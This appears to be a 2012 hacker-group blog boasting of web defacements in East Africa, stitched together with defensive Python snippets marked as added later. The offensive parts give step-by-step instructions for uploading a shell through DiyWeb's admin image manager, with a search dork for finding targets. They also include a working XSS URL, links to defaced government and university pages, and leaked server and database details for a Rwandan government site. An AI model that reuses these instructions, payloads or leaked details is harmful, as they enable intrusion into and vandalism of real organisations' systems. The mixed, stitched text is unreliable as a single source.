Thursday, August 30, 2012

DiyWeb Admin Bypass and Remote file/shell Upload exploit


Exploit title : DiyWeb Admin Bypass and file Upload exploit
Discovered By : NoentryPhc
Server : windows
Type : web application
Shell extension : .asp

Dork : "Power by DiyWeb" inurl:/template.asp?menuid=
Poc : diyweb/menu/admin/image_manager.asp
Almost all websites vulnerable to this exploit are Malaysian.
To upload your files go to : http://www.website.com/diyweb/menu/admin/image_manager.asp

and upload your shell/deface there !
If the .php extension is not allowed then you can try Tamper Data and Live HTTP Headers.
To access your file go to : http://www.website.com/Images/yourfilehere and sometimes you have to find your file manually on the website.
Link:http://www.famosapadu.com.my/images/index.html
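For anyone defending a DiyWeb site, here is an added example (not part of the original post) that scans IIS W3C logs for the pattern described above: hits on the admin image manager and script files later served from the /Images/ upload folder. The log excerpt is constructed, and the list of script extensions is an assumption about the server's handler mappings.

```python
import re
from collections import defaultdict

# Constructed IIS W3C log excerpt (not from the page): a normal page hit,
# two hits on the DiyWeb image manager, a script file later fetched from
# the /Images/ upload folder, and one ordinary image request.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2012-08-30 10:01:02 203.0.113.5 GET /template.asp menuid=12 200
2012-08-30 10:01:09 203.0.113.5 GET /diyweb/menu/admin/image_manager.asp - 200
2012-08-30 10:01:31 203.0.113.5 POST /diyweb/menu/admin/image_manager.asp - 200
2012-08-30 10:02:04 203.0.113.5 GET /Images/img01.asp - 200
2012-08-30 10:02:05 198.51.100.7 GET /Images/logo.gif - 200
"""

ADMIN_PATH = "/diyweb/menu/admin/image_manager.asp"
# Extensions IIS executes as server-side script (assumed mapping); /Images/ should hold none.
SCRIPT_EXT = re.compile(r"\.(asp|aspx|asa|cer|cdx|php)$", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields: line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def find_upload_abuse(text):
    """Group suspicious requests by client IP: every hit on the image
    manager (to be reviewed against the addresses the real admins use)
    and every script file served from the upload folder."""
    findings = defaultdict(list)
    for rec in parse_w3c(text):
        path = rec["cs-uri-stem"]
        if path.lower() == ADMIN_PATH:
            findings[rec["c-ip"]].append(
                f"{rec['cs-method']} image manager at {rec['time']}")
        elif path.lower().startswith("/images/") and SCRIPT_EXT.search(path):
            findings[rec["c-ip"]].append(f"script served from upload folder: {path}")
    return dict(findings)


if __name__ == "__main__":
    for ip, events in find_upload_abuse(SAMPLE_LOG).items():
        print(ip, *events, sep="\n  ")
```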

Google website vulnerable to XSS

Link:http://commondatastorage.googleapis.com/chromium-browser-continuous/index.html?path=%22%3E%3Cscript%3Ealert%28%27XSS-BY-RWANDAN-HACKERS%27%29%3C/script%3E

We discovered a cross-site scripting (XSS) vulnerability in a Google website. We have already reported the vulnerability to a Google security expert.

Wednesday, August 29, 2012

Biochemistry - Makerere University website HACKED !!!

Link:http://biochemistry.mak.ac.ug/start/index.php
Makerere University Department Of Biochemistry hacked by Rwandan Hackers
Dedications to "UGANDAN HACKERS"

ADMIN PANEL

Saturday, August 18, 2012

National Oil Corporation of Kenya Defaced by Rwandan hackers


HACKED LINK:http://www.nockenya.co.ke/images/hacked.html


National Oil is a state corporation under the Ministry of Energy, incorporated in April 1981 and charged with participation in all aspects of the petroleum industry. National Oil has a 100% Government of Kenya shareholding.
National Oil became operational in 1984 and its initial operations were limited to exploration activities delegated from the Ministry of Energy. In 1988, National Oil went downstream and actively started participating in the importation and sale of petroleum products including crude oil, white fuels, lubricants and LPG.
The formation of National Oil was precipitated by the oil crises of the 1970s (1973/74 and 1979/80) and the corresponding supply disruptions and price hikes, which resulted in the country's oil bill comprising almost one third of the total value of imports, making petroleum the largest single drain on Kenya's foreign exchange earnings.
National Oil was therefore born out of a need by the Government of Kenya to have greater control of the petroleum sector, which is a crucial determinant of the country’s economic performance. National Oil has since remained the Government’s policy instrument in matters related to oil, specifically in the upstream exploration of oil and gas, mid-stream development of petroleum infrastructure and downstream marketing of petroleum products including motor and industrial fuels, lubricants, LPG and related motor consumables and hardware.

WE ARE BACK KENYA !!!

Sunday, August 12, 2012

Orinfor.gov.rw hacked #database Leaked


VULNERABILITY DESCRIPTION:

Apache httpd Remote Denial of Service
Vulnerability description
A denial of service vulnerability has been found in the way multiple overlapping byte ranges are handled by the Apache HTTPD server:

http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild, and active use of this tool has been observed. The attack can be done remotely, and with a modest number of requests it can cause very significant memory and CPU usage on the server.


This alert was generated using only banner information.

Affected Apache versions: 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19.

This vulnerability affects Web Server.
Discovered by: Scripting (Version_Check.script).
Attack details
Current version is : 2.2.8
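As an added example (not from the original post or from the scanner that produced the alert), a Python filter in the spirit of the upstream workaround of refusing requests that carry more than a handful of ranges: it parses the Range header and drops it when the request is malformed, has too many ranges, or has overlapping ones. The sample headers and the threshold of 5 are constructed assumptions.

```python
import re

# Constructed Range headers (not from the page): a normal resumable
# download and one shaped like the overlapping-range flood described above.
NORMAL_RANGE = "bytes=0-499,1000-1499"
FLOOD_RANGE = "bytes=" + ",".join(f"0-{i}" for i in range(1, 1301))

MAX_RANGES = 5  # assumed policy threshold; no legitimate client needs more

_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_ranges(header, content_length):
    """Return [(start, end), ...] for a byte-range header, or None if it is
    malformed. Suffix ranges such as "-500" are resolved against the length."""
    if not header.startswith("bytes="):
        return None
    ranges = []
    for spec in header[6:].split(","):
        m = _SPEC.match(spec.strip())
        if not m or (m.group(1) == "" and m.group(2) == ""):
            return None
        first, last = m.groups()
        if first == "":
            start, end = max(0, content_length - int(last)), content_length - 1
        else:
            start = int(first)
            end = content_length - 1 if last == "" else min(int(last), content_length - 1)
        if start > end:
            return None
        ranges.append((start, end))
    return ranges


def count_overlaps(ranges):
    """Count neighbouring ranges (after sorting) that share bytes; a
    well-behaved client never asks for the same bytes twice."""
    ordered = sorted(ranges)
    return sum(1 for (_, e1), (s2, _) in zip(ordered, ordered[1:]) if s2 <= e1)


def should_reject(header, content_length, max_ranges=MAX_RANGES):
    """Policy for a front-end filter: drop the Range header (and serve the
    whole body) when it is malformed, too long, or contains overlaps."""
    ranges = parse_ranges(header, content_length)
    return ranges is None or len(ranges) > max_ranges or count_overlaps(ranges) > 0
```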

Some server details and IP addresses from orinfor:
SERVER INFO:
Target:http://www.orinfor.gov.rw/
Host IP:41.74.172.227
Web Server:Apache/2.2.8 (Ubuntu)
DB Server:MySQL
Resp. Time(avg):1406 ms
Current User:datareader@localhost
Sql Version:5.0.96-0ubuntu3
Current DB:orinfordb
System User:datareader@localhost
Host Name:orinfor-webbackup
Installation dir:/usr/
DB User & Pass:
Databases: information_schema, mysql, orinfordb


ADMIN PASSWORD

Table:orinfor_users
Total Rows:5




Saturday, August 4, 2012

Rwandan diaspora website hacked by Rwandan Hackers #GOV.RW

The Rwandan diaspora website has been hacked by Rwandan Hackers
Link:http://jobs.rwandandiaspora.gov.rw/cv/34testRwandanhackers.txt


Vulnerability description
Manual confirmation is required for this alert.


This page is using a weak password. A weak password is short, common, a system default, or something that could be rapidly guessed by a brute-force attack using a subset of all possible passwords, such as dictionary words, proper names, words based on the user name, or common variations on these themes.
Affected items
/profileloginconfirm.php 
The impact of this vulnerability
An attacker may access the contents of the password-protected page.


How to fix this vulnerability
Enforce a strong password policy. Don't permit weak passwords or passwords based on dictionary words.
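An added example (not from the original post or from the scanner) of a check that enforces that definition at registration or password-change time: minimum length, dictionary words including their leet-decorated forms, derivatives of the user name, and trivial sequences. The wordlist, the 12-character minimum and the test accounts are constructed.

```python
import re

# Constructed mini wordlist standing in for a real dictionary / breached
# password list (not from the page); a deployment loads a full one from disk.
COMMON = {"password", "admin", "welcome", "letmein", "qwerty", "123456",
          "rwanda", "diaspora", "kigali", "changeme"}
LEET = str.maketrans("@$031!", "asoeli")  # p@ssw0rd -> password
MIN_LENGTH = 12  # assumed policy value


def base_word(password):
    """Expose the word underneath the usual decorations: lowercase, drop
    leading/trailing digits and symbols, then undo leet substitutions."""
    trimmed = re.sub(r"^[^a-z]+|[^a-z]+$", "", password.lower())
    return trimmed.translate(LEET)


def weak_reasons(password, username):
    """Return the policy rules a password breaks (empty list = accept),
    following the definition above: short, common or dictionary word,
    based on the user name, or a trivial sequence."""
    reasons = []
    if len(password) < MIN_LENGTH:
        reasons.append("too short")
    core = base_word(password)
    if core in COMMON or password.lower() in COMMON:
        reasons.append("common or dictionary word")
    user = username.lower()
    if len(core) >= 3 and (core in user or user in core or core == user[::-1]):
        reasons.append("based on the user name")
    if password.isdigit() or len(set(password)) == 1:
        reasons.append("trivial sequence")
    return reasons


if __name__ == "__main__":
    for pw, user in [("P@ssw0rd1", "editor"), ("JohnDoe2012!", "johndoe"),
                     ("correct horse battery staple", "editor")]:
        print(pw, "->", weak_reasons(pw, user) or "accepted")
```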



Igihe website infected with malware



It seems that the site igihe.com was infected by a Russian hacker, because igihe.com was being redirected to websites hosted in Russia: http://ilulxak.ru / http://nycaqsy.ru .


We wrote an article on vulnerabilities found in igihe.com website some days ago
http://rwandan-hackers.blogspot.fr/2012/07/igihecom-vulnerable-to-xss.html

I think the hacker used this exploit

http://www.exploit-db.com/exploits/9448/ [SPIP < 2.0.9 Arbitrary Copy All Passwords to XML File Remote Exploit]

https://badwarebusters.org/main/itemview/7997 [more advice Here ]


I think you’ll find that the site has been compromised because of a leaked password.
Several infections seem to exist on the site.

First of all, check the administrative PC for malware, use multiple AV and Malware scanners to check and remove any found.

Change the password of the FTP, preferably from an alternate PC.

Do NOT store the password in your FTP client.

Find and remove the malware that is on the site:
Your .htaccess file may redirect search engine traffic, so please check the .htaccess file in all folders including above the root folder of the site itself.
You’ve also got a Martuz or a variant thereof, so you will likely find iframes or malicious scripts embedded in the various files of your site. Check both normal HTML/PHP files and script files.

When all is done and found, you can request a Review from Google Webmaster Tools. This review will take a few hours, but if no suspicious activity is found, then the site will be taken off the suspicious list.

Tools you may find useful, including website scanners:
http://badwarebusters.org/main/itemview/1659#itemblock-3035

Google webmaster tools:
http://www.google.com/webmasters/tools/

Your Diagnostics page:
http://www.google.com/safebrowsing/diagnostic?site=http://igihe.com
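An added example (not part of the original post or of the badwarebusters advice) that mechanises the two checks above over a site checkout: a search-engine referer redirect in .htaccess files, including those above the web root, and hidden iframes in page files. The sample .htaccess and page are constructed; real infections vary, so treat the patterns as a starting point rather than a complete signature set.

```python
import os
import re

# Constructed samples (not taken from igihe.com) of the two infection patterns
# described above: a referer-conditional redirect and an invisible iframe.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*(google|yahoo|bing)\\..* [NC]
RewriteRule .* http://redirect.example.invalid/go.php [R,L]
"""
SAMPLE_PAGE = """\
<html><body><h1>News</h1>
<iframe src="http://payload.example.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
"""

SEARCH_REFERER = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}.*(google|yahoo|bing)", re.I)
EXTERNAL_REDIRECT = re.compile(r"RewriteRule\s+\S+\s+https?://", re.I)
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*(width=[\"']?[01]\b|height=[\"']?[01]\b"
                           r"|visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>", re.I)
PAGE_EXT = (".html", ".htm", ".php", ".js")


def scan_htaccess(text):
    """Flag a search-engine referer test paired with a rewrite to an external
    host: the search-traffic hijack the advice above warns about."""
    if SEARCH_REFERER.search(text) and EXTERNAL_REDIRECT.search(text):
        return ["search-engine referer redirect to external host"]
    return []

def scan_page(text):
    """Flag 1x1 or hidden iframes, the usual carrier for injected content."""
    return ["hidden iframe: " + m.group(0)[:70] for m in HIDDEN_IFRAME.finditer(text)]

def scan_tree(root):
    """Walk a site checkout (start above the web root so parent .htaccess
    files are covered); return {path: findings} for every file with hits."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            is_htaccess = name == ".htaccess"
            if not is_htaccess and not name.lower().endswith(PAGE_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            hits = scan_htaccess(text) if is_htaccess else scan_page(text)
            if hits:
                report[path] = hits
    return report
```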

The website is under construction

Update at 00:12, August 4, 2012:

I saw that they copied this article to explain the nature of the virus.
Next time, do your work and stop copying our work.